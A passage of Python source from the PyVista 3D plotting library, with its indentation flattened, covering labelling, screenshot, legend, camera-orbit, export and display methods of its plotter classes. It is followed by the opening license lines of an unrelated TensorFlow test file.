actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetLineWidth(width)
actor.GetProperty().EdgeVisibilityOn()
actor.GetProperty().SetEdgeColor(rgb_color)
actor.GetProperty().SetColor(rgb_color)
actor.GetProperty().LightingOff()
# Add to renderer
self.add_actor(actor, reset_camera=False, name=name, pickable=False)
return actor
def remove_scalar_bar(self):
"""Remove the scalar bar."""
if hasattr(self, 'scalar_bar'):
self.remove_actor(self.scalar_bar, reset_camera=False)
def add_point_labels(self, points, labels, italic=False, bold=True,
font_size=None, text_color=None,
font_family=None, shadow=False,
show_points=True, point_color=None, point_size=5,
name=None, shape_color='grey', shape='rounded_rect',
fill_shape=True, margin=3, shape_opacity=1.0,
pickable=False, render_points_as_spheres=False,
tolerance=0.001, reset_camera=None, always_visible=False):
"""Create a point actor with one label from list labels assigned to each point.
Parameters
----------
points : np.ndarray or pyvista.Common
n x 3 numpy array of points or pyvista dataset with points
labels : list or str
List of labels. Must be the same length as points. If a string name
is given with a pyvista.Common input for points, then these are fetched.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
font_size : float, optional
Sets the size of the label font. Defaults to the value of ``rcParams['font']['size']``.
text_color : string or 3 item list, optional
Color of text. Either a string, rgb list, or hex color string.
text_color='white'
text_color='w'
text_color=[1, 1, 1]
text_color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
show_points : bool, optional
Controls if points are visible. Default True
point_color : string or 3 item list, optional. Color of points (if visible).
Either a string, rgb list, or hex color string. For example:
point_color='white'
point_color='w'
point_color=[1, 1, 1]
point_color='#FFFFFF'
point_size : float, optional
Size of points (if visible)
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
shape_color : string or 3 item list, optional. Color of the label background shape.
Either a string, rgb list, or hex color string.
shape : str, optional
The string name of the shape to use. Options are ``'rect'`` or
``'rounded_rect'``. If you want no shape, pass ``None``
fill_shape : bool, optional
Fill the shape with the ``shape_color``. Outlines if ``False``.
margin : int, optional
The size of the margin on the label background shape. Default is 3.
shape_opacity : float
The opacity of the shape between zero and one.
tolerance : float
a tolerance to use to determine whether a point label is visible.
A tolerance is usually required because the conversion from world
space to display space during rendering introduces numerical
round-off.
reset_camera : bool, optional
Reset the camera after adding the points to the scene.
always_visible : bool, optional
Skip adding the visibility filter. Default False.
Return
------
labelActor : vtk.vtkActor2D
VTK label actor. Can be used to change properties of the labels.
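Examples
--------
A minimal sketch labeling three points (one label per point):
>>> import numpy as np
>>> import pyvista
>>> plotter = pyvista.Plotter(off_screen=True)
>>> points = np.array([[0.0, 0.0, 0.0], [1.0, 1.0, 0.0], [2.0, 0.0, 0.0]])
>>> actor = plotter.add_point_labels(points, ['A', 'B', 'C'], font_size=24, point_size=10)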
"""
if font_family is None:
font_family = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if point_color is None:
point_color = rcParams['color']
if text_color is None:
text_color = rcParams['font']['color']
if isinstance(points, (list, tuple)):
points = np.array(points)
if isinstance(points, np.ndarray):
vtkpoints = pyvista.PolyData(points) # Cast to poly data
elif is_pyvista_dataset(points):
vtkpoints = pyvista.PolyData(points.points)
if isinstance(labels, str):
labels = points.point_arrays[labels].astype(str)
else:
raise TypeError(f'Points type not usable: {type(points)}')
if len(vtkpoints.points) != len(labels):
raise ValueError('There must be one label for each point')
if name is None:
name = f'{type(vtkpoints).__name__}({vtkpoints.memory_address})'
vtklabels = vtk.vtkStringArray()
vtklabels.SetName('labels')
for item in labels:
vtklabels.InsertNextValue(str(item))
vtkpoints.GetPointData().AddArray(vtklabels)
# Create hierarchy
hier = vtk.vtkPointSetToLabelHierarchy()
hier.SetLabelArrayName('labels')
if always_visible:
hier.SetInputData(vtkpoints)
else:
# Only show visible points
vis_points = vtk.vtkSelectVisiblePoints()
vis_points.SetInputData(vtkpoints)
vis_points.SetRenderer(self.renderer)
vis_points.SetTolerance(tolerance)
hier.SetInputConnection(vis_points.GetOutputPort())
# create label mapper
labelMapper = vtk.vtkLabelPlacementMapper()
labelMapper.SetInputConnection(hier.GetOutputPort())
if not isinstance(shape, str):
labelMapper.SetShapeToNone()
elif shape.lower() == 'rect':
labelMapper.SetShapeToRect()
elif shape.lower() == 'rounded_rect':
labelMapper.SetShapeToRoundedRect()
else:
raise ValueError(f'Shape ({shape}) not understood')
if fill_shape:
labelMapper.SetStyleToFilled()
else:
labelMapper.SetStyleToOutline()
labelMapper.SetBackgroundColor(parse_color(shape_color))
labelMapper.SetBackgroundOpacity(shape_opacity)
labelMapper.SetMargin(margin)
textprop = hier.GetTextProperty()
textprop.SetItalic(italic)
textprop.SetBold(bold)
textprop.SetFontSize(font_size)
textprop.SetFontFamily(parse_font_family(font_family))
textprop.SetColor(parse_color(text_color))
textprop.SetShadow(shadow)
self.remove_actor(f'{name}-points', reset_camera=False)
self.remove_actor(f'{name}-labels', reset_camera=False)
# add points
if show_points:
style = 'points'
else:
style = 'surface'
self.add_mesh(vtkpoints, style=style, color=point_color,
point_size=point_size, name=f'{name}-points',
pickable=pickable,
render_points_as_spheres=render_points_as_spheres,
reset_camera=reset_camera)
labelActor = vtk.vtkActor2D()
labelActor.SetMapper(labelMapper)
self.add_actor(labelActor, reset_camera=False,
name=f'{name}-labels', pickable=False)
return labelActor
def add_point_scalar_labels(self, points, labels, fmt=None, preamble='', **kwargs):
"""Label the points from a dataset with the values of their scalars.
Wrapper for :func:`pyvista.BasePlotter.add_point_labels`.
Parameters
----------
points : np.ndarray or pyvista.Common
n x 3 numpy array of points or pyvista dataset with points
labels : str
String name of the point data array to use.
fmt : str
String formatter used to format numerical data
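Examples
--------
A minimal sketch, where ``'values'`` is a hypothetical point array name:
>>> import numpy as np
>>> import pyvista
>>> cloud = pyvista.PolyData(np.random.rand(5, 3))
>>> cloud['values'] = np.arange(5)
>>> plotter = pyvista.Plotter(off_screen=True)
>>> actor = plotter.add_point_scalar_labels(cloud, 'values', fmt='%.1f')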
"""
if not is_pyvista_dataset(points):
raise TypeError(f'input points must be a pyvista dataset, not: {type(points)}')
if not isinstance(labels, str):
raise TypeError('labels must be a string name of the scalars array to use')
if fmt is None:
fmt = rcParams['font']['fmt']
if fmt is None:
fmt = '%.6e'
scalars = points.point_arrays[labels]
phrase = f'{preamble} {fmt}'
labels = [phrase % val for val in scalars]
return self.add_point_labels(points, labels, **kwargs)
def add_points(self, points, **kwargs):
"""Add points to a mesh."""
kwargs['style'] = 'points'
return self.add_mesh(points, **kwargs)
def add_arrows(self, cent, direction, mag=1, **kwargs):
"""Add arrows to plotting object."""
direction = direction.copy()
if cent.ndim != 2:
cent = cent.reshape((-1, 3))
if direction.ndim != 2:
direction = direction.reshape((-1, 3))
direction[:,0] *= mag
direction[:,1] *= mag
direction[:,2] *= mag
pdata = pyvista.vector_poly_data(cent, direction)
# Create arrow object
arrow = vtk.vtkArrowSource()
arrow.Update()
glyph3D = vtk.vtkGlyph3D()
glyph3D.SetSourceData(arrow.GetOutput())
glyph3D.SetInputData(pdata)
glyph3D.SetVectorModeToUseVector()
glyph3D.Update()
arrows = wrap(glyph3D.GetOutput())
return self.add_mesh(arrows, **kwargs)
@staticmethod
def _save_image(image, filename, return_img=None):
"""Save a NumPy image array.
This is an internal helper.
"""
if not image.size:
raise ValueError('Empty image. Have you run plot() first?')
# write screenshot to file
supported_formats = [".png", ".jpeg", ".jpg", ".bmp", ".tif", ".tiff"]
if isinstance(filename, (str, pathlib.Path)):
filename = pathlib.Path(filename)
if isinstance(pyvista.FIGURE_PATH, str) and not filename.is_absolute():
filename = pathlib.Path(os.path.join(pyvista.FIGURE_PATH, filename))
if not filename.suffix:
filename = filename.with_suffix('.png')
elif filename.suffix not in supported_formats:
raise ValueError(f'Unsupported extension {filename.suffix}\n' +
f'Must be one of the following: {supported_formats}')
w = imageio.imwrite(os.path.abspath(os.path.expanduser(str(filename))),
image)
if not return_img:
return w
return image
def save_graphic(self, filename, title='PyVista Export', raster=True, painter=True):
"""Save a screenshot of the rendering window as a graphic file.
The supported formats are: '.svg', '.eps', '.ps', '.pdf', '.tex'
"""
if not hasattr(self, 'ren_win'):
raise AttributeError('This plotter is closed and unable to save a screenshot.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
filename = os.path.abspath(os.path.expanduser(filename))
extension = pyvista.fileio.get_ext(filename)
valid = ['.svg', '.eps', '.ps', '.pdf', '.tex']
if extension not in valid:
raise ValueError(f"Extension ({extension}) is an invalid choice. Valid options include: {', '.join(valid)}")
writer = vtk.vtkGL2PSExporter()
modes = {
'.svg': writer.SetFileFormatToSVG,
'.eps': writer.SetFileFormatToEPS,
'.ps': writer.SetFileFormatToPS,
'.pdf': writer.SetFileFormatToPDF,
'.tex': writer.SetFileFormatToTeX,
}
writer.CompressOff()
writer.SetFilePrefix(filename.replace(extension, ''))
writer.SetInput(self.ren_win)
modes[extension]()
writer.SetTitle(title)
writer.SetWrite3DPropsAsRasterImage(raster)
if painter:
writer.UsePainterSettings()
writer.Update()
return
def screenshot(self, filename=None, transparent_background=None,
return_img=None, window_size=None):
"""Take screenshot at current camera position.
Parameters
----------
filename : str, optional
Location to write image to. If None, no image is written.
transparent_background : bool, optional
Makes the background transparent. Default False.
return_img : bool, optional
If a string filename is given and this is true, a NumPy array of
the image will be returned.
Return
------
img : numpy.ndarray
Array containing pixel RGB and alpha. Sized:
[Window height x Window width x 3] for transparent_background=False
[Window height x Window width x 4] for transparent_background=True
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter(off_screen=True)
>>> actor = plotter.add_mesh(sphere)
>>> plotter.screenshot('screenshot.png') # doctest:+SKIP
"""
if window_size is not None:
self.window_size = window_size
# configure image filter
if transparent_background is None:
transparent_background = rcParams['transparent_background']
self.image_transparent_background = transparent_background
# This if statement allows you to save screenshots of closed plotters
# This is needed for the sphinx-gallery work
if not hasattr(self, 'ren_win'):
# If plotter has been closed...
# check if last_image exists
if hasattr(self, 'last_image'):
# Save last image
return self._save_image(self.last_image, filename, return_img)
# Plotter hasn't been rendered or was improperly closed
raise AttributeError('This plotter is closed and unable to save a screenshot.')
if self._first_time and not self.off_screen:
raise RuntimeError("Nothing to screenshot - call .show first or "
"use the off_screen argument")
self.render()
# debug: this needs to be called twice for some reason,
img = self.image
img = self.image
return self._save_image(img, filename, return_img)
def add_legend(self, labels=None, bcolor=(0.5, 0.5, 0.5), border=False,
size=None, name=None):
"""Add a legend to render window.
Entries must be a list containing one string and color entry for each
item.
Parameters
----------
labels : list, optional
When set to None, uses existing labels as specified by
- add_mesh
- add_lines
- add_points
List containing one entry for each item to be added to the
legend. Each entry must contain two strings, [label,
color], where label is the name of the item to add, and
color is the color of the label to add.
bcolor : list or string, optional
Background color, either a three item 0 to 1 RGB color
list, or a matplotlib color string (e.g. 'w' or 'white'
for a white color). If None, legend background is
disabled.
border : bool, optional
Controls if there will be a border around the legend.
Default False.
size : list, optional
Two float list, each float between 0 and 1. For example
[0.1, 0.1] would make the legend 10% the size of the
entire figure window.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Return
------
legend : vtk.vtkLegendBoxActor
Actor for the legend.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, label='My Mesh')
>>> _ = plotter.add_mesh(othermesh, 'k', label='My Other Mesh')
>>> _ = plotter.add_legend()
>>> plotter.show() # doctest:+SKIP
Alternative manual example
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> legend_entries = []
>>> legend_entries.append(['My Mesh', 'w'])
>>> legend_entries.append(['My Other Mesh', 'k'])
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh)
>>> _ = plotter.add_mesh(othermesh, 'k')
>>> _ = plotter.add_legend(legend_entries)
>>> plotter.show() # doctest:+SKIP
"""
self.legend = vtk.vtkLegendBoxActor()
if labels is None:
# use existing labels
if not self._labels:
raise ValueError('No labels input.\n\n'
'Add labels to individual items when adding them to'
'the plotting object with the "label=" parameter. '
'or enter them as the "labels" parameter.')
self.legend.SetNumberOfEntries(len(self._labels))
for i, (vtk_object, text, color) in enumerate(self._labels):
self.legend.SetEntry(i, vtk_object, text, parse_color(color))
else:
self.legend.SetNumberOfEntries(len(labels))
legendface = pyvista.single_triangle()
for i, (text, color) in enumerate(labels):
self.legend.SetEntry(i, legendface, text, parse_color(color))
if size:
self.legend.SetPosition2(size[0], size[1])
if bcolor is None:
self.legend.UseBackgroundOff()
else:
self.legend.UseBackgroundOn()
self.legend.SetBackgroundColor(bcolor)
if border:
self.legend.BorderOn()
else:
self.legend.BorderOff()
# Add to renderer
self.add_actor(self.legend, reset_camera=False, name=name, pickable=False)
return self.legend
def set_background(self, color, top=None, all_renderers=True):
"""Set the background color.
Parameters
----------
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
top : string or 3 item list, optional, defaults to None
If given, this will enable a gradient background where the
``color`` argument is at the bottom and the color given in ``top``
will be the color at the top of the renderer.
all_renderers : bool
If True, applies to all renderers in subplots. If False, then
only applies to the active renderer.
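Examples
--------
Illustrative sketch of a plain and a gradient background; the mesh
and color choices below are arbitrary:
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> plotter.set_background('black')
>>> plotter.set_background('white', top='blue')  # gradient background
>>> plotter.show()  # doctest:+SKIP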
"""
if all_renderers:
for renderer in self.renderers:
renderer.set_background(color, top=top)
self._shadow_renderer.set_background(color)
else:
self.renderer.set_background(color, top=top)
def remove_legend(self):
"""Remove the legend actor."""
if hasattr(self, 'legend'):
self.remove_actor(self.legend, reset_camera=False)
self.render()
def generate_orbital_path(self, factor=3., n_points=20, viewup=None, shift=0.0):
"""Generate an orbital path around the data scene.
Parameters
----------
factor : float
A scaling factor when building the orbital extent.
n_points : int
Number of points on the orbital path.
viewup : list(float)
The normal to the orbital plane.
shift : float, optional
Shift the plane up/down from the center of the scene by this amount.
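Examples
--------
Minimal sketch of generating a path above a scene; the factor, point
count, and shift used here are arbitrary choices:
>>> import pyvista
>>> from pyvista import examples
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(examples.load_hexbeam())
>>> path = plotter.generate_orbital_path(factor=2.0, n_points=50, shift=1.0)
>>> plotter.orbit_on_path(path)  # doctest:+SKIP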
"""
if viewup is None:
viewup = rcParams['camera']['viewup']
center = np.array(self.center)
bnds = np.array(self.bounds)
radius = (bnds[1] - bnds[0]) * factor
y = (bnds[3] - bnds[2]) * factor
if y > radius:
radius = y
center += np.array(viewup) * shift
return pyvista.Polygon(center=center, radius=radius, normal=viewup, n_sides=n_points)
def fly_to(self, point):
"""Move the current camera's focal point to a position point.
The movement is animated over the number of frames specified in
NumberOfFlyFrames. The LOD desired frame rate is used.
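Examples
--------
Illustrative sketch; the target point is an arbitrary coordinate:
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> plotter.fly_to((0.5, 0.0, 0.0))  # doctest:+SKIP
>>> plotter.show()  # doctest:+SKIP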
"""
if not hasattr(self, 'iren'):
raise AttributeError('This plotter does not have an interactive window')
return self.iren.FlyTo(self.renderer, *point)
def orbit_on_path(self, path=None, focus=None, step=0.5, viewup=None,
write_frames=False, threaded=False):
"""Orbit on the given path focusing on the focus point.
Parameters
----------
path : pyvista.PolyData
Path of orbital points. The order of the points is the order of
travel.
focus : list(float) of length 3, optional
The point of focus for the camera.
step : float, optional
The timestep between flying to each camera position.
viewup : list(float)
The normal to the orbital plane.
write_frames : bool
Assume a file is open and write a frame on each camera view during
the orbit.
threaded : bool, optional
Run this as a background thread. Generally used within a
GUI (i.e. PyQt).
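Examples
--------
Sketch of orbiting around a mesh while writing movie frames; this
assumes a movie file has been opened with ``open_movie`` and the
file name is a placeholder:
>>> import pyvista
>>> from pyvista import examples
>>> plotter = pyvista.Plotter(off_screen=True)
>>> _ = plotter.add_mesh(examples.load_uniform())
>>> plotter.open_movie('orbit.mp4')  # doctest:+SKIP
>>> path = plotter.generate_orbital_path(n_points=36)
>>> plotter.orbit_on_path(path, step=0.05, write_frames=True)  # doctest:+SKIP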
"""
if focus is None:
focus = self.center
if viewup is None:
viewup = rcParams['camera']['viewup']
if path is None:
path = self.generate_orbital_path(viewup=viewup)
if not is_pyvista_dataset(path):
path = pyvista.PolyData(path)
points = path.points
# Make sure the whole scene is visible
self.camera.SetThickness(path.length)
def orbit():
"""Define the internal thread for running the orbit."""
for point in points:
self.set_position(point)
self.set_focus(focus)
self.set_viewup(viewup)
self.renderer.ResetCameraClippingRange()
self.render()
time.sleep(step)
if write_frames:
self.write_frame()
if threaded:
thread = Thread(target=orbit)
thread.start()
else:
orbit()
return
def export_vtkjs(self, filename, compress_arrays=False):
"""Export the current rendering scene as a VTKjs scene.
It can be used for rendering in a web browser.
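Examples
--------
Minimal sketch; ``'my_scene'`` is a placeholder output name:
>>> import pyvista
>>> plotter = pyvista.Plotter(off_screen=True)
>>> _ = plotter.add_mesh(pyvista.Cone())
>>> plotter.export_vtkjs('my_scene')  # doctest:+SKIP
>>> plotter.show()  # doctest:+SKIP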
"""
if not hasattr(self, 'ren_win'):
raise RuntimeError('Export must be called before showing/closing the scene.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
return export_plotter_vtkjs(self, filename, compress_arrays=compress_arrays)
def export_obj(self, filename):
"""Export scene to OBJ format."""
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter must still have a render window open.")
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
else:
filename = os.path.abspath(os.path.expanduser(filename))
exporter = vtk.vtkOBJExporter()
exporter.SetFilePrefix(filename)
exporter.SetRenderWindow(self.ren_win)
return exporter.Write()
def __del__(self):
"""Delete the plotter."""
if not self._closed:
self.close()
self.deep_clean()
del self.renderers
del self._shadow_renderer
def add_background_image(self, image_path, scale=1, auto_resize=True,
as_global=True):
"""Add a background image to a plot.
Parameters
----------
image_path : str
Path to an image file.
scale : float, optional
Scale the image larger or smaller relative to the size of
the window. For example, a scale size of 2 will make the
largest dimension of the image twice as large as the
largest dimension of the render window. Defaults to 1.
auto_resize : bool, optional
Resize the background when the render window changes size.
as_global : bool, optional
When multiple render windows are present, setting
``as_global=False`` will cause the background to only
appear in one window.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(pyvista.Sphere())
>>> plotter.add_background_image(examples.mapfile)
>>> plotter.show() # doctest:+SKIP
"""
# verify no render exists
if self._background_renderers[self._active_renderer_index] is not None:
raise RuntimeError('A background image already exists. '
'Remove it with remove_background_image '
'before adding one')
# Need to change the number of layers to support an additional
# background layer
self.ren_win.SetNumberOfLayers(3)
if as_global:
for renderer in self.renderers:
renderer.SetLayer(2)
view_port = None
else:
self.renderer.SetLayer(2)
view_port = self.renderer.GetViewport()
renderer = BackgroundRenderer(self, image_path, scale, view_port)
renderer.SetLayer(1)
self.ren_win.AddRenderer(renderer)
self._background_renderers[self._active_renderer_index] = renderer
# setup autoscaling of the image
if auto_resize and hasattr(self, 'iren'): # pragma: no cover
self._add_observer('ModifiedEvent', renderer.resize)
def remove_background_image(self):
"""Remove the background image from the current subplot."""
renderer = self._background_renderers[self._active_renderer_index]
if renderer is None:
raise RuntimeError('No background image to remove at this subplot')
renderer.deep_clean()
self._background_renderers[self._active_renderer_index] = None
def reset_camera_clipping_range(self):
"""Reset camera clipping planes."""
self.renderer.ResetCameraClippingRange()
class Plotter(BasePlotter):
"""Plotting object to display vtk meshes or numpy arrays.
Example
-------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> another_mesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, color='red')
>>> _ = plotter.add_mesh(another_mesh, color='blue')
>>> plotter.show() # doctest:+SKIP
Parameters
----------
off_screen : bool, optional
Renders off screen when True. Useful for automated screenshots.
notebook : bool, optional
When True, the resulting plot is placed inline in a jupyter notebook.
Assumes a jupyter console is active. Automatically enables off_screen.
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one render window.
Can also accept a string descriptor as shape. E.g.:
* ``shape="3|1"`` means 3 plots on the left and 1 on the right,
* ``shape="4/2"`` means 4 plots on top and 2 at the bottom.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1, 1, 1]``
* ``color='#FFFFFF'``
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
multi_samples : int
The number of multi-samples used to mitigate aliasing. 4 is a good
default but 8 will have better results with a potential impact on
performance.
line_smoothing : bool
If True, enable line smoothing.
point_smoothing : bool
If True, enable point smoothing.
polygon_smoothing : bool
If True, enable polygon smoothing.
"""
last_update_time = 0.0
right_timer_id = -1
def __init__(self, off_screen=None, notebook=None, shape=(1, 1),
groups=None, row_weights=None, col_weights=None,
border=None, border_color='k', border_width=2.0,
window_size=None, multi_samples=None, line_smoothing=False,
point_smoothing=False, polygon_smoothing=False,
splitting_position=None, title=None):
"""Initialize a vtk plotting object."""
super().__init__(shape=shape, border=border,
border_color=border_color,
border_width=border_width,
groups=groups, row_weights=row_weights,
col_weights=col_weights,
splitting_position=splitting_position,
title=title)
log.debug('Plotter init start')
def on_timer(iren, event_id):
"""Exit application if interactive renderer stops."""
if event_id == 'TimerEvent':
self.iren.TerminateApp()
if off_screen is None:
off_screen = pyvista.OFF_SCREEN
if notebook is None:
notebook = scooby.in_ipykernel()
self.notebook = notebook
if self.notebook:
off_screen = True
self.off_screen = off_screen
if window_size is None:
window_size = rcParams['window_size']
self.__prior_window_size = window_size
if multi_samples is None:
multi_samples = rcParams['multi_samples']
# initialize render window
self.ren_win = vtk.vtkRenderWindow()
self.ren_win.SetMultiSamples(multi_samples)
self.ren_win.SetBorders(True)
if line_smoothing:
self.ren_win.LineSmoothingOn()
if point_smoothing:
self.ren_win.PointSmoothingOn()
if polygon_smoothing:
self.ren_win.PolygonSmoothingOn()
for renderer in self.renderers:
self.ren_win.AddRenderer(renderer)
# Add the shadow renderer to allow us to capture interactions within
# a given viewport
# https://vtk.org/pipermail/vtkusers/2018-June/102030.html
number_of_layers = self.ren_win.GetNumberOfLayers()
current_layer = self.renderer.GetLayer()
self.ren_win.SetNumberOfLayers(number_of_layers + 1)
self.ren_win.AddRenderer(self._shadow_renderer)
self._shadow_renderer.SetLayer(current_layer + 1)
self._shadow_renderer.SetInteractive(False) # never needs to capture
if self.off_screen:
self.ren_win.SetOffScreenRendering(1)
else: # Allow user to interact
self.iren = vtk.vtkRenderWindowInteractor()
self.iren.LightFollowCameraOff()
self.iren.SetDesiredUpdateRate(30.0)
self.iren.SetRenderWindow(self.ren_win)
self.enable_trackball_style() # internally calls update_style()
self._observers = {} # Map of events to observers of self.iren
self._add_observer("KeyPressEvent", self.key_press_event)
# Set background
self.set_background(rcParams['background'])
# Set window size
self.window_size = window_size
# add timer event if interactive render exists
self._add_observer(vtk.vtkCommand.TimerEvent, on_timer)
if rcParams["depth_peeling"]["enabled"]:
if self.enable_depth_peeling():
for renderer in self.renderers:
renderer.enable_depth_peeling()
log.debug('Plotter init stop')
def show(self, title=None, window_size=None, interactive=True,
auto_close=None, interactive_update=False, full_screen=False,
screenshot=False, return_img=False, use_panel=None, cpos=None,
height=400):
"""Display the plotting window.
Notes
-----
Please use the ``q``-key to close the plotter as some operating systems
(namely Windows) will experience issues saving a screenshot if the
exit button in the GUI is pressed.
Parameters
----------
title : string, optional
Title of plotting window.
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
interactive : bool, optional
Enabled by default. Allows user to pan and move figure.
auto_close : bool, optional
Enabled by default. Exits plotting session when user
closes the window when interactive is True.
interactive_update : bool, optional
Disabled by default. Allows the user to draw without blocking;
the user should call ``Update()`` in each iteration.
full_screen : bool, optional
Opens window in full screen. When enabled, ignores
window_size. Default False.
use_panel : bool, optional
If False, the interactive rendering from panel will not be used in
notebooks.
cpos : list(tuple(floats))
The camera position to use.
height : int, optional
Height of the panel pane. Only used with panel.
Return
------
cpos : list
List of camera position, focal point, and view up
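Examples
--------
Minimal sketch; ``'sphere.png'`` is a placeholder screenshot name:
>>> import pyvista
>>> plotter = pyvista.Plotter(off_screen=True)
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> cpos = plotter.show(screenshot='sphere.png')  # doctest:+SKIP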
"""
if use_panel is None:
use_panel = rcParams['use_panel']
if auto_close is None:
auto_close = rcParams['auto_close']
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter has been closed and cannot be shown.")
# reset the camera on the first render unless the camera is already set
if self._first_time: # and not self.camera_set:
for renderer in self.renderers:
if not renderer.camera_set and cpos is None:
renderer.camera_position = renderer.get_default_cam_pos()
renderer.ResetCamera()
elif cpos is not None:
renderer.camera_position = cpos
self._first_time = False
# if full_screen:
if full_screen:
self.ren_win.SetFullScreen(True)
self.ren_win.BordersOn() # super buggy when disabled
else:
if window_size is None:
window_size = self.window_size
self.ren_win.SetSize(window_size[0], window_size[1])
# Render
log.debug('Rendering')
self.render()
# This has to be after the first render for some reason
if title is None:
title = self.title
if title:
self.ren_win.SetWindowName(title)
self.title = title
# Keep track of image for sphinx-gallery
if pyvista.BUILDING_GALLERY or screenshot:
# always save screenshots for sphinx_gallery
self.last_image = self.screenshot(screenshot, return_img=True)
self.last_image_depth = self.get_image_depth()
disp = None
self.update() # For Windows issues. Resolves #186
# See: https://github.com/pyvista/pyvista/issues/186#issuecomment-550993270
if interactive and (not self.off_screen):
try: # interrupts will be caught here
log.debug('Starting iren')
self.update_style()
self.iren.Initialize()
if not interactive_update:
self.iren.Start()
except KeyboardInterrupt:
log.debug('KeyboardInterrupt')
self.close()
raise KeyboardInterrupt
elif self.notebook and use_panel and not hasattr(self, 'volume'):
try:
from panel.pane import VTK as panel_display
disp = panel_display(self.ren_win, sizing_mode='stretch_width',
height=height)
except:
pass
# In the event that the user hits the exit-button on the GUI (on
# Windows OS) then it must be finalized and deleted as accessing it
# will kill the kernel.
# Here we check for that and clean it up before moving on to any of
# the closing routines that might try to still access that
# render window.
if not self.ren_win.IsCurrent():
self._clear_ren_win() # The ren_win is deleted
# proper screenshots cannot be saved if this happens
if not auto_close:
warnings.warn("`auto_close` ignored: by clicking the exit button, you have destroyed the render window and we have to close it out.")
auto_close = True
# NOTE: after this point, nothing from the render window can be accessed
# as if a user pressed the close button, then it destroys the
# render view and a stream of errors will kill the Python
# kernel if code here tries to access that renderer.
# See issues #135 and #186 for insight before editing the
# remainder of this function.
# Get camera position before closing
cpos = self.camera_position
# NOTE: our conversion to panel currently does not support multi-view
# so we should display the static screenshot in notebooks for
# multi-view plots until we implement this feature
# If notebook is true and panel display failed:
if self.notebook and (disp is None or self.shape != (1, 1)):
import PIL.Image
# sanity check
try:
import IPython
except ImportError:
raise ImportError('Install IPython to display image in a notebook')
if not hasattr(self, 'last_image'):
self.last_image = self.screenshot(screenshot, return_img=True)
disp = IPython.display.display(PIL.Image.fromarray(self.last_image))
# Cleanup
if auto_close:
self.close()
# Return the notebook display: either panel object or image display
if self.notebook:
return disp
# If user asked for screenshot, return as numpy array after camera
# position
if return_img or screenshot is True:
return cpos, self.last_image
# default to returning last used camera position
return cpos
def plot(self, *args, **kwargs):
"""Create a plotting window.
Present for backwards compatibility.
DEPRECATED: Please use `show()` instead.
"""
logging.warning("`.plot()` is deprecated. Please use `.show()` instead.")
return self.show(*args, **kwargs)
def _style_factory(klass):
"""Create a subclass with capturing ability, return it."""
# We have to use a custom subclass for this because the default ones
# swallow the release events
# http://vtk.1045678.n5.nabble.com/Mouse-button-release-event-is-still-broken-in-VTK-6-0-0-td5724762.html # noqa
class CustomStyle(getattr(vtk, 'vtkInteractorStyle' + klass)):
def __init__(self, parent):
super().__init__()
self._parent = parent
self.AddObserver(
"LeftButtonPressEvent",
partial(try_callback, self._press))
self.AddObserver(
"LeftButtonReleaseEvent",
partial(try_callback, self._release))
def _press(self, obj, event):
# Figure out which renderer has the event and disable the
# others
super().OnLeftButtonDown()
if len(self._parent.renderers) > 1:
click_pos = self._parent.iren.GetEventPosition()
for renderer in self._parent.renderers:
interact = renderer.IsInViewport(*click_pos)
renderer.SetInteractive(interact)
def _release(self, obj, event):
super().OnLeftButtonUp()
if len(self._parent.renderers) > 1:
for renderer in self._parent.renderers:
renderer.SetInteractive(True)
return CustomStyle
|
random_shuffle_queue_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
